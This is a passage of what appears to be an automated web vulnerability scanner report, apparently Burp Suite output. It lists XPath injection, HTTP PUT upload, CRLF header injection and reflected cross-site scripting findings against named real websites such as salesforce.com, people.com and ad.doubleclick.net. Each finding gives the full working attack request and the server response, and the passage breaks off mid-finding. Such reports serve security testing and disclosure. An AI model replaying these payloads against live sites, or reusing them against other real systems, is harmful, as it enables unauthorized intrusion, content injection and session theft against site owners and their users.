Set-Cookie: fl-uid=03f6276b0fa2982d890f0193e189b615%2C1%2C1301748253; expires=Sun, 01-Apr-2012 12:44:13 GMT; path=/; domain=.thefind.com
Content-Language: en
Vary: Accept-Encoding
Status: 200 OK
Content-Length: 78472
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:elation="http://www.ajaxelation.com/xmlns">
<head>
<title>TheFind - Shopped &amp; Found</title>


<script type="text/javascri
...[SNIP]...
<script type="text/javascript" src="//cdn.thefind.com/scripts/main/utils-initjquery-elation-browser-tracking-panel-ajaxlib-events-ui-msie~xpath/tplmgr-tplmgr/ui-infobox/user-user/marketing-bigpicture/jquery-suggest/search-suggest-input-search">
...[SNIP]...

3.4. http://www.wwe.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wwe.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /favicon.ico' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wwe.com
Accept: */*
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 404 Not Found
Server: Apache/2.2.17
Last-Modified: Fri, 01 Apr 2011 16:47:30 +0000
Vary: Cookie
ETag: "1301676450"
X-App: p5tyr3
Content-Type: text/html; charset=utf-8
X-Varnish: 1587144406 1587143361
X-CacheTyr-Server: p5tyr3
X-CacheTyr: HIT
X-CacheTyr-Hits: 1
X-Cacheable: NO: beresp.status 1
X-Cacheable-status: 404
Content-Length: 53517
X-Varnish: 979578143 959694108
X-CacheKyte-Server: p5kyte7
X-CacheKyte: HIT
X-CacheKyte-Hits: 1002095
Vary: Accept-Encoding
Cache-Control: public, must-revalidate, max-age=11294
Date: Sat, 02 Apr 2011 13:39:46 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta http-equi
...[SNIP]...

jQuery.extend(Drupal.settings, {"basePath":"\/","automodal":{".automodal":{"autoFit":false,"draggable":true,"width":2000,"height":2000,"automodalClose":true,"automodalReload":false}},"jcarousel":{"ajaxPath":"\/jcarousel\/ajax\/views"},"twitter_enabled":true,"getQ":"node\/16810560","views":{"ajax_path":"\/views\/ajax","ajaxViews":[{"view_name":"promo_pod","view_display_id":"block_1","view_args":"","view_
...[SNIP]...

4. HTTP PUT enabled

Summary

Severity:   High
Confidence:   Certain
Host:   https://activresa-secure2.icor.fr
Path:   /

Issue detail

HTTP PUT is enabled on the web server. The file /9a847644e2391b55.txt was uploaded to the server using the PUT verb, and the contents of the file were subsequently retrieved using the GET verb.

Request 1

PUT /9a847644e2391b55.txt HTTP/1.0
Host: activresa-secure2.icor.fr
Content-Length: 16

facafbdd945895ba

Response 1

HTTP/1.1 201 Created
Connection: close
Date: Sat, 02 Apr 2011 12:48:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: https://activresa-secure2.icor.fr/9a847644e2391b55.txt
Content-Length: 0
Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, LOCK, UNLOCK

Request 2

GET /9a847644e2391b55.txt HTTP/1.0
Host: activresa-secure2.icor.fr

Response 2

HTTP/1.1 200 OK
Cache-Control: max-age=60
Content-Length: 16
Content-Type: text/plain
Last-Modified: Sat, 02 Apr 2011 12:48:23 GMT
Accept-Ranges: bytes
ETag: W/"5222c64034f1cb1:3765"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 12:48:23 GMT
Connection: close

facafbdd945895ba

5. HTTP header injection
There are 15 instances of this issue:


5.1. http://www.ew.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ew.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 7805c%0d%0aa049615f928 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /7805c%0d%0aa049615f928 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ew.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Date: Sat, 02 Apr 2011 13:32:14 GMT
Location: http://www.ew.com/ew/7805c
a049615f928

Vary: Accept-Encoding
Content-Length: 307
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www.ew.com/ew/78
...[SNIP]...

5.2. http://www.familyeducation.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.familyeducation.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 2afbc%0d%0a10ac4b7e696 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /favicon.ico2afbc%0d%0a10ac4b7e696 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.familyeducation.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 Redirect
Server: Microsoft-IIS/5.0
Date: Sat, 02 Apr 2011 13:57:17 GMT
Location: /defaultpage.htm?/favicon.ico2afbc
10ac4b7e696



5.3. http://www.health.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.health.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload a5cc2%0d%0a808e9ba22de was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /a5cc2%0d%0a808e9ba22de HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.health.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Date: Sat, 02 Apr 2011 13:35:15 GMT
Location: http://www.health.com/health/a5cc2
808e9ba22de

Vary: Accept-Encoding
Content-Length: 319
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www.health.com/h
...[SNIP]...

5.4. http://www.homestead.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.homestead.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload a31ef%0d%0ac36e0392523 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /a31ef%0d%0ac36e0392523 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.homestead.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/5.0
Date: Sat, 02 Apr 2011 13:35:09 GMT
Location: /a31ef
c36e0392523
/


5.5. http://www.instyle.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.instyle.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload b65da%0d%0aa9cfd0405fc was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /b65da%0d%0aa9cfd0405fc HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.instyle.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Date: Sat, 02 Apr 2011 14:04:58 GMT
Location: http://www.instyle.com/instyle/b65da
a9cfd0405fc

Vary: Accept-Encoding
Content-Length: 322
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www.instyle.com/
...[SNIP]...

5.6. http://www.livingsocial.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.livingsocial.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload a8e30%0d%0ab8e0c5a066b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /a8e30%0d%0ab8e0c5a066b HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.livingsocial.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Sat, 02 Apr 2011 13:38:58 GMT
Content-Type: text/html
Content-Length: 178
Connection: keep-alive
Location: http://livingsocial.com/a8e30
b8e0c5a066b


<html>
<head><title>301 Moved Permanently</title></head>
<body bgcolor="white">
<center><h1>301 Moved Permanently</h1></center>
<hr><center>nginx</center>
</body>
</html>

5.7. http://www.people.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.people.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload fade4%0d%0a04e193106f1 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /fade4%0d%0a04e193106f1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.people.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Date: Sat, 02 Apr 2011 12:43:26 GMT
Location: http://www.people.com/people/fade4
04e193106f1

Vary: Accept-Encoding
Content-Length: 319
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www.people.com/p
...[SNIP]...

5.8. http://www.peoplestylewatch.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.peoplestylewatch.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 894db%0d%0ab895b7fee0e was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /894db%0d%0ab895b7fee0e HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.peoplestylewatch.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Date: Sat, 02 Apr 2011 13:56:32 GMT
Location: http://www.people.com/894db
b895b7fee0e

Vary: Accept-Encoding
Content-Length: 322
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www.people.com/8
...[SNIP]...

5.9. http://www.salesforce.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.salesforce.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 7f0d3%0d%0a3d52478bda4 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /7f0d3%0d%0a3d52478bda4 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.salesforce.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Server: SFDC
Location: /7f0d3
3d52478bda4
/
Date: Sat, 02 Apr 2011 13:46:30 GMT
Content-Length: 77

The URL has moved to <a href="/7f0d3
3d52478bda4/">/7f0d3
3d52478bda4/</a>

5.10. http://www.shop.com/favicon.ico [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.shop.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload e81a0%0d%0a052c3a9c4af was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /favicon.ico?e81a0%0d%0a052c3a9c4af=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.shop.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 URL Redirect
Server: AMOS/1.0
Date: Sat, 02 Apr 2011 13:41:32 GMT
Content-Type: text/html
Content-Length: 301
Location: http://edge.shop.com/ccimg.shop.com/web/favicon.ico?e81a0
052c3a9c4af
=1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache

<html><head><title>Document Moved</title>
<META URL=http://edge.shop.com/ccimg.shop.com/web/favicon.ico?e81a0
052c3a9c4af=1">
</head>
<body><h1>Object Moved</h1>This document may be found <a href=
...[SNIP]...

5.11. http://www.shopcompanion.com/favicon.ico [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.shopcompanion.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 3f544%0d%0a18f859d78f2 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /favicon.ico?3f544%0d%0a18f859d78f2=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.shopcompanion.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 URL Redirect
Server: AMOS/1.0
Date: Sat, 02 Apr 2011 14:00:40 GMT
Content-Type: text/html
Content-Length: 301
Location: http://edge.shop.com/ccimg.shop.com/web/favicon.ico?3f544
18f859d78f2
=1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache

<html><head><title>Document Moved</title>
<META URL=http://edge.shop.com/ccimg.shop.com/web/favicon.ico?3f544
18f859d78f2=1">
</head>
<body><h1>Object Moved</h1>This document may be found <a href=
...[SNIP]...

5.12. http://www.tbo.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tbo.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload fefb7%0d%0ad3916ee3b78 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /fefb7%0d%0ad3916ee3b78 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tbo.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Server: nginx/0.6.32
Date: Sat, 02 Apr 2011 13:59:19 GMT
Content-Type: text/html
Content-Length: 185
Connection: keep-alive
Location: http://www2.tbo.com/fefb7
d3916ee3b78

Server-Name: media2

<html>
<head><title>301 Moved Permanently</title></head>
<body bgcolor="white">
<center><h1>301 Moved Permanently</h1></center>
<hr><center>nginx/0.6.32</center>
</body>
</html>

5.13. http://www.thisoldhouse.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thisoldhouse.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload ff592%0d%0afdec1d1094 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /ff592%0d%0afdec1d1094 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.thisoldhouse.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Date: Sat, 02 Apr 2011 14:13:11 GMT
Location: http://www.thisoldhouse.com/toh/ff592
fdec1d1094

Vary: Accept-Encoding
Content-Length: 327
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www.thisoldhouse
...[SNIP]...

5.14. http://www.wn.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wn.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload aa6b8%0d%0a651e1e31954 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /aa6b8%0d%0a651e1e31954 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wn.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Date: Sat, 02 Apr 2011 13:39:56 GMT
Server: Apache/2.2.16 (Debian)
Location: http://wn.com/aa6b8
651e1e31954

Vary: Accept-Encoding
Content-Length: 316
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://wn.com/aa6b8
65
...[SNIP]...

5.15. http://www.youravon.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.youravon.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 3419d%0d%0a6094b152882 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /3419d%0d%0a6094b152882 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.youravon.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 Found
Date: Sat, 02 Apr 2011 13:37:45 GMT
Server: IBM_HTTP_Server
Location: http://3419d
6094b152882
.avonrepresentative.com/
Content-Length: 301
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://3419d
6094b152882.avonrepresentative.co
...[SNIP]...

6. Cross-site scripting (reflected)
There are 122 instances of this issue:


6.1. http://ad.doubleclick.net/adi/N1260.Google.com/B5219922.27 [adurl parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1260.Google.com/B5219922.27

Issue detail

The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1b0fb"-alert(1)-"131e368384f was submitted in the adurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N1260.Google.com/B5219922.27;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BiFx0Dh2XTaX3Ic7ilQf6iqHVCPux5J4C25fY3hvAjbcB4JuQAhABGAEgvs7lDTgAUJT5_pcHYMkGoAHN19niA7IBBnhzcy5jeLoBCTcyOHg5MF9hc8gBCdoBUGh0dHA6Ly94c3MuY3gvZXhhbXBsZXMvaHRtbC9jYXBlYy04Ni1kb3JrLXhzcy1jcm9zcy1zaXRlLXNjcmlwdGluZy1leGFtcGxlcy5odG1suAIYyAKzq8AcqAMB0QNb5as_VmQv-OgDigPoAx_oAwX1AwAAAMQ&num=1&sig=AGiWqtxII5ILhYzUahUeLNR8TnlD6RZSPQ&client=ca-pub-4063878933780912&adurl=1b0fb"-alert(1)-"131e368384f HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1300998819&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2Fexamples%2Fhtml%2Fcapec-86-dork-xss-cross-site-scripting-examples.html&dt=1301749042824&bpp=3&shv=r20110324&jsv=r20110321-2&correlator=1301749042836&frm=0&adk=1607234649&ga_vid=1243467471.1301749043&ga_sid=1301749043&ga_hid=1328169759&ga_fc=0&u_tz=-300&u_his=21&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=998&bih=1004&fu=0&ifi=1&dtd=16&xpc=E2Nhb6Q087&p=http%3A//xss.cx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7224
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:00:26 GMT
Expires: Sat, 02 Apr 2011 13:00:26 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
XBlYy04Ni1kb3JrLXhzcy1jcm9zcy1zaXRlLXNjcmlwdGluZy1leGFtcGxlcy5odG1suAIYyAKzq8AcqAMB0QNb5as_VmQv-OgDigPoAx_oAwX1AwAAAMQ&num=1&sig=AGiWqtxII5ILhYzUahUeLNR8TnlD6RZSPQ&client=ca-pub-4063878933780912&adurl=1b0fb"-alert(1)-"131e368384fhttp://www.webex.com/lpintl/us/banner/next-meeting-together.html?TrackID=1024434");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess =
...[SNIP]...

6.2. http://ad.doubleclick.net/adi/N1260.Google.com/B5219922.27 [ai parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1260.Google.com/B5219922.27

Issue detail

The value of the ai request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 61763"-alert(1)-"fd5b291024e was submitted in the ai parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N1260.Google.com/B5219922.27;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BiFx0Dh2XTaX3Ic7ilQf6iqHVCPux5J4C25fY3hvAjbcB4JuQAhABGAEgvs7lDTgAUJT5_pcHYMkGoAHN19niA7IBBnhzcy5jeLoBCTcyOHg5MF9hc8gBCdoBUGh0dHA6Ly94c3MuY3gvZXhhbXBsZXMvaHRtbC9jYXBlYy04Ni1kb3JrLXhzcy1jcm9zcy1zaXRlLXNjcmlwdGluZy1leGFtcGxlcy5odG1suAIYyAKzq8AcqAMB0QNb5as_VmQv-OgDigPoAx_oAwX1AwAAAMQ61763"-alert(1)-"fd5b291024e&num=1&sig=AGiWqtxII5ILhYzUahUeLNR8TnlD6RZSPQ&client=ca-pub-4063878933780912&adurl=;ord=879784873? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1300998819&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2Fexamples%2Fhtml%2Fcapec-86-dork-xss-cross-site-scripting-examples.html&dt=1301749042824&bpp=3&shv=r20110324&jsv=r20110321-2&correlator=1301749042836&frm=0&adk=1607234649&ga_vid=1243467471.1301749043&ga_sid=1301749043&ga_hid=1328169759&ga_fc=0&u_tz=-300&u_his=21&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=998&bih=1004&fu=0&ifi=1&dtd=16&xpc=E2Nhb6Q087&p=http%3A//xss.cx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 02 Apr 2011 12:57:47 GMT
Vary: Accept-Encoding
Expires: Sat, 02 Apr 2011 12:57:47 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7244

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
HN19niA7IBBnhzcy5jeLoBCTcyOHg5MF9hc8gBCdoBUGh0dHA6Ly94c3MuY3gvZXhhbXBsZXMvaHRtbC9jYXBlYy04Ni1kb3JrLXhzcy1jcm9zcy1zaXRlLXNjcmlwdGluZy1leGFtcGxlcy5odG1suAIYyAKzq8AcqAMB0QNb5as_VmQv-OgDigPoAx_oAwX1AwAAAMQ61763"-alert(1)-"fd5b291024e&num=1&sig=AGiWqtxII5ILhYzUahUeLNR8TnlD6RZSPQ&client=ca-pub-4063878933780912&adurl=http%3a%2f%2fwww.webex.com/lpintl/us/banner/lets-get-together.html%3FTrackID%3D1024433");
var fscUrl = url;
var fscU
...[SNIP]...

6.3. http://ad.doubleclick.net/adi/N1260.Google.com/B5219922.27 [client parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1260.Google.com/B5219922.27

Issue detail

The value of the client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 20aba"-alert(1)-"6d10011bb3f was submitted in the client parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N1260.Google.com/B5219922.27;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BiFx0Dh2XTaX3Ic7ilQf6iqHVCPux5J4C25fY3hvAjbcB4JuQAhABGAEgvs7lDTgAUJT5_pcHYMkGoAHN19niA7IBBnhzcy5jeLoBCTcyOHg5MF9hc8gBCdoBUGh0dHA6Ly94c3MuY3gvZXhhbXBsZXMvaHRtbC9jYXBlYy04Ni1kb3JrLXhzcy1jcm9zcy1zaXRlLXNjcmlwdGluZy1leGFtcGxlcy5odG1suAIYyAKzq8AcqAMB0QNb5as_VmQv-OgDigPoAx_oAwX1AwAAAMQ&num=1&sig=AGiWqtxII5ILhYzUahUeLNR8TnlD6RZSPQ&client=ca-pub-406387893378091220aba"-alert(1)-"6d10011bb3f&adurl=;ord=879784873? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1300998819&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2Fexamples%2Fhtml%2Fcapec-86-dork-xss-cross-site-scripting-examples.html&dt=1301749042824&bpp=3&shv=r20110324&jsv=r20110321-2&correlator=1301749042836&frm=0&adk=1607234649&ga_vid=1243467471.1301749043&ga_sid=1301749043&ga_hid=1328169759&ga_fc=0&u_tz=-300&u_his=21&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=998&bih=1004&fu=0&ifi=1&dtd=16&xpc=E2Nhb6Q087&p=http%3A//xss.cx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
